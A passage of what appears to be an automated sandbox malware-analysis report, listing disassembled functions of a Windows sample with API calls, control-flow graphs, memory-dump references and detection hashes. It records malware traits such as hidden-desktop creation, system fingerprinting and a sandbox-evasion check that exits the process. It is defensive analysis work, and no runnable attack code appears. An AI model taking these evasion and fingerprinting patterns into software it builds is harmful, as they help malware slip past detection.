                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                • API String ID: 2238633743-3468015613
                                • Opcode ID: c9af724fa137b11aca247ebd70519d02282791e15647946a6da99b64f5a55375
                                • Instruction ID: 0690f0a266b25dd00250afb6ea38a9f8f8a46a76fe7094927bf42a3216d6f3ad
                                • Opcode Fuzzy Hash: c9af724fa137b11aca247ebd70519d02282791e15647946a6da99b64f5a55375
                                • Instruction Fuzzy Hash: 13620AB5611A00EFD754DF79EC88E363BBAF7886413108919E996C3364EF34A881DF64
                                Function 006DF1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(006ECFEC), ref: 006DF1D5
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DF1F1
                                • lstrlen.KERNEL32(006ECFEC), ref: 006DF1FC
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DF215
                                • lstrlen.KERNEL32(006ECFEC), ref: 006DF220
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DF239
                                • lstrcpy.KERNEL32(00000000,006F4FA0), ref: 006DF25E
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DF28C
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DF2C0
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DF2F0
                                • lstrlen.KERNEL32(00F05550), ref: 006DF315
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: 1695e2957d720ea84cb84840174dba7b451fea5d1d86921e4effd5121bd22e28
                                • Instruction ID: c994e8a91547e1c4866e22605a2e5b5e9442018ec516abf7a3b9ff1c702e60be
                                • Opcode Fuzzy Hash: 1695e2957d720ea84cb84840174dba7b451fea5d1d86921e4effd5121bd22e28
                                • Instruction Fuzzy Hash: 60A21770D016069FCB60DF76D948AAAB7F6BF44314B19807EE84ADB361DB35D842CB90
                                Function 006DFFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E0013
                                • lstrlen.KERNEL32(006ECFEC), ref: 006E00BD
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E00E1
                                • lstrlen.KERNEL32(006ECFEC), ref: 006E00EC
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E0110
                                • lstrlen.KERNEL32(006ECFEC), ref: 006E011B
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E013F
                                • lstrlen.KERNEL32(006ECFEC), ref: 006E015A
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E0189
                                • lstrlen.KERNEL32(006ECFEC), ref: 006E0194
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E01C3
                                • lstrlen.KERNEL32(006ECFEC), ref: 006E01CE
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E0206
                                • lstrlen.KERNEL32(006ECFEC), ref: 006E0250
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E0288
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E059B
                                • lstrlen.KERNEL32(00F054F0), ref: 006E05AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E05D7
                                • lstrcat.KERNEL32(00000000,?), ref: 006E05E3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E060E
                                • lstrlen.KERNEL32(00F20478), ref: 006E0625
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E064C
                                • lstrcat.KERNEL32(00000000,?), ref: 006E0658
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E0681
                                • lstrlen.KERNEL32(00F054D0), ref: 006E0698
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E06C9
                                • lstrcat.KERNEL32(00000000,?), ref: 006E06D5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E0706
                                • lstrcpy.KERNEL32(00000000,00F18C10), ref: 006E074B
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1557
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C1579
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C159B
                                  • Part of subcall function 006C1530: lstrcpy.KERNEL32(00000000,?), ref: 006C15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E077F
                                • lstrcpy.KERNEL32(00000000,00F20688), ref: 006E07E7
                                • lstrcpy.KERNEL32(00000000,00F18A20), ref: 006E0858
                                • lstrcpy.KERNEL32(00000000,fplugins), ref: 006E08CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E0928
                                • lstrcpy.KERNEL32(00000000,00F18A10), ref: 006E09F8
                                  • Part of subcall function 006C24E0: lstrcpy.KERNEL32(00000000,?), ref: 006C2528
                                  • Part of subcall function 006C24E0: lstrcpy.KERNEL32(00000000,?), ref: 006C254E
                                  • Part of subcall function 006C24E0: lstrcpy.KERNEL32(00000000,?), ref: 006C2577
                                • lstrcpy.KERNEL32(00000000,00F18A60), ref: 006E0ACE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E0B81
                                • lstrcpy.KERNEL32(00000000,00F18A60), ref: 006E0D58
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID: fplugins
                                • API String ID: 2500673778-38756186
                                • Opcode ID: 80d1183af7b2cc7c9589ec036435baec497eaa7747fe5b84f0f10d7ae0e2215e
                                • Instruction ID: 0cbc8236179f8760609a6cfeefa85d10ae9cf2011c3a462377aedc8a812fedd3
                                • Opcode Fuzzy Hash: 80d1183af7b2cc7c9589ec036435baec497eaa7747fe5b84f0f10d7ae0e2215e
                                • Instruction Fuzzy Hash: BBE24E709063818FD774DF2AC488BAAB7E2BF89314F58856DD48D8B352DB71D885CB42
                                Function 006DF2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00F05550), ref: 006DF315
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DF3A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DF3C7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DF47B
                                • lstrcpy.KERNEL32(00000000,00F05550), ref: 006DF4BB
                                • lstrcpy.KERNEL32(00000000,00F18B00), ref: 006DF4EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DF59E
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006DF61C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DF64C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DF69A
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 006DF718
                                • lstrlen.KERNEL32(00F18AC0), ref: 006DF746
                                • lstrcpy.KERNEL32(00000000,00F18AC0), ref: 006DF771
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DF793
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DF7E4
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 006DFA32
                                • lstrlen.KERNEL32(00F18BB0), ref: 006DFA60
                                • lstrcpy.KERNEL32(00000000,00F18BB0), ref: 006DFA8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DFAAD
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DFAFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: 0f019b696fef9ae60c57f2989abfb148073053a1a60cd66265336c49ab27088c
                                • Instruction ID: 0c21bf373b315c059874f03bda44635508fe2111cab6a356e1c42e425860310d
                                • Opcode Fuzzy Hash: 0f019b696fef9ae60c57f2989abfb148073053a1a60cd66265336c49ab27088c
                                • Instruction Fuzzy Hash: 34F12970A01202CFCB64DF69D954AA9B7E6BF44314B1980BED84ADB362DB36DC42CB50
                                Function 006D8CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2721 6d8ca0-6d8cc4 StrCmpCA 2722 6d8ccd-6d8ce6 2721->2722 2723 6d8cc6-6d8cc7 ExitProcess 2721->2723 2725 6d8cec-6d8cf1 2722->2725 2726 6d8ee2-6d8eef call 6c2a20 2722->2726 2727 6d8cf6-6d8cf9 2725->2727 2729 6d8cff 2727->2729 2730 6d8ec3-6d8edc 2727->2730 2732 6d8e6f-6d8e7d StrCmpCA 2729->2732 2733 6d8e88-6d8e9a lstrlen 2729->2733 2734 6d8d84-6d8d92 StrCmpCA 2729->2734 2735 6d8da4-6d8db8 StrCmpCA 2729->2735 2736 6d8d06-6d8d15 lstrlen 2729->2736 2737 6d8dbd-6d8dcb StrCmpCA 2729->2737 2738 6d8ddd-6d8deb StrCmpCA 2729->2738 2739 6d8dfd-6d8e0b StrCmpCA 2729->2739 2740 6d8e1d-6d8e2b StrCmpCA 2729->2740 2741 6d8e3d-6d8e4b StrCmpCA 2729->2741 2742 6d8d5a-6d8d69 lstrlen 2729->2742 2743 6d8e56-6d8e64 StrCmpCA 2729->2743 2744 6d8d30-6d8d3f lstrlen 2729->2744 2730->2726 2766 6d8cf3 2730->2766 2732->2730 2757 6d8e7f-6d8e86 2732->2757 2758 6d8e9c-6d8ea1 call 6c2a20 2733->2758 2759 6d8ea4-6d8eb0 call 6c2930 2733->2759 2734->2730 2748 6d8d98-6d8d9f 2734->2748 2735->2730 2753 6d8d1f-6d8d2b call 6c2930 2736->2753 2754 6d8d17-6d8d1c call 6c2a20 2736->2754 2737->2730 2749 6d8dd1-6d8dd8 2737->2749 2738->2730 2750 6d8df1-6d8df8 2738->2750 2739->2730 2751 6d8e11-6d8e18 2739->2751 2740->2730 2752 6d8e31-6d8e38 2740->2752 2741->2730 2755 6d8e4d-6d8e54 2741->2755 2745 6d8d6b-6d8d70 call 6c2a20 2742->2745 2746 6d8d73-6d8d7f call 6c2930 2742->2746 2743->2730 2756 6d8e66-6d8e6d 2743->2756 2760 6d8d49-6d8d55 call 6c2930 2744->2760 2761 6d8d41-6d8d46 call 6c2a20 2744->2761 2745->2746 2779 6d8eb3-6d8eb5 2746->2779 2748->2730 2749->2730 2750->2730 2751->2730 2752->2730 2753->2779 2754->2753 2755->2730 2756->2730 2757->2730 2758->2759 2759->2779 2760->2779 2761->2760 2766->2727 2779->2730 2780 6d8eb7-6d8eb9 2779->2780 2780->2730 2781 6d8ebb-6d8ebd lstrcpy 2780->2781 2781->2730
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: d4c495a734f04a2fc25a0c7ddc341e4551c957a0abfb5297194e86d2740e3a2c
                                • Instruction ID: 6b68ebe2934323f3581208bc8989723cf76bb98b4c854a0ccebba71aef030394
                                • Opcode Fuzzy Hash: d4c495a734f04a2fc25a0c7ddc341e4551c957a0abfb5297194e86d2740e3a2c
                                • Instruction Fuzzy Hash: 19513770E04606EFCB209F76D989E7B7BE6BB54B00B10482EE586D3752DF74A5428F21
                                Function 006E2740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2782 6e2740-6e2783 GetWindowsDirectoryA 2783 6e278c-6e27ea GetVolumeInformationA 2782->2783 2784 6e2785 2782->2784 2785 6e27ec-6e27f2 2783->2785 2784->2783 2786 6e2809-6e2820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 6e27f4-6e2807 2785->2787 2788 6e2826-6e2844 wsprintfA 2786->2788 2789 6e2822-6e2824 2786->2789 2787->2785 2790 6e285b-6e2872 call 6e71e0 2788->2790 2789->2790
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 006E277B
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,006D93B6,00000000,00000000,00000000,00000000), ref: 006E27AC
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006E280F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E2816
                                • wsprintfA.USER32 ref: 006E283B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                • String ID: :\$C
                                • API String ID: 2572753744-3309953409
                                • Opcode ID: c4301bcae64526aac294446e9f5902cc5a103e02ead25d8f6c7307f723732ab0
                                • Instruction ID: 338ec5da1294fc3521d847818e61fb127925335160cd975c3e14f905a6b205b8
                                • Opcode Fuzzy Hash: c4301bcae64526aac294446e9f5902cc5a103e02ead25d8f6c7307f723732ab0
                                • Instruction Fuzzy Hash: 27316DB194924A9FCB04CFB98985AEFBFBDFF58710F10016EE505E7650E6349A40CBA1
                                Function 006C4BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2793 6c4bc0-6c4bce 2794 6c4bd0-6c4bd5 2793->2794 2794->2794 2795 6c4bd7-6c4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 6c2a20 2794->2795
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 006C4BF7
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 006C4C01
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 006C4C0B
                                • lstrlen.KERNEL32(?,00000000,?), ref: 006C4C1F
                                • InternetCrackUrlA.WININET(?,00000000), ref: 006C4C27
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1683549937-4251816714
                                • Opcode ID: 917ef8de12e0e6c44ddcda8f3687fa7ac0cf02ddf17d804125e5098295188d05
                                • Instruction ID: 97729e1e1c4b51348d6a9bdecea54dfc445a5a62989edd450b443b5a0fbcd008
                                • Opcode Fuzzy Hash: 917ef8de12e0e6c44ddcda8f3687fa7ac0cf02ddf17d804125e5098295188d05
                                • Instruction Fuzzy Hash: AD010971D00218ABDB50DBA9E845B9EBBA9EB08320F00412AF914E7290DE7459048B94
                                Function 006C1030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2798 6c1030-6c1055 GetCurrentProcess VirtualAllocExNuma 2799 6c105e-6c107b VirtualAlloc 2798->2799 2800 6c1057-6c1058 ExitProcess 2798->2800 2801 6c107d-6c1080 2799->2801 2802 6c1082-6c1088 2799->2802 2801->2802 2803 6c108a-6c10ab VirtualFree 2802->2803 2804 6c10b1-6c10b6 2802->2804 2803->2804
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006C1046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 006C104D
                                • ExitProcess.KERNEL32 ref: 006C1058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006C106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 006C10AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
